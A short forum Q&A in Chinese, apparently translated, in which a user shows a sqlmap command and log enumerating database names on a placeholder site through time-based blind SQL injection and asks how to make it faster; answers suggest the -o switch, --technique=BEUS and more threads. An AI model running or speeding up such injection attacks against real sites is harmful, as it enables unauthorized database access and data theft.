sqlmap太慢

Question

下面是一个例子。我只是想列出数据库：

python sqlmap.py -u "http://somesite.com/?id=1" --dbs

[15:20:32] [INFO] fetching database names
[15:20:32] [INFO] fetching number of databases
[15:20:32] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:20:39] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
2
[15:20:55] [INFO] adjusting time delay to 2 seconds due to good response times
2
[15:20:58] [INFO] retrieved: 100_MYDB
[15:22:39] [INFO] retrieved: DEV_GC_DATASTORAGE
[15:26:15] [INFO] retrieved: GC_

您可以在时间戳中看到，列出一个数据库名称大约需要3分钟，逐个字符，每个字符大约需要7秒。我在youtube上看到的教程非常快...我能做些什么来加快速度呢？我试过和.conf打交道

谢谢。

Answer 1

somesite.com的网络延迟是多少？您可以通过简单地执行ping somesite.com来检查此情况。如果延迟很高，当您逐个字符测试时，执行盲SQL注入将会很慢。- rgerganov Jul 4，19:43

Answer 2

您还可以使用-o开关进行一些优化。也可以尝试--technique=BEUS

Answer 3

使用更多线程。默认值为1：

       --threads=THREADS
          Max number of concurrent HTTP(s) requests (default 1)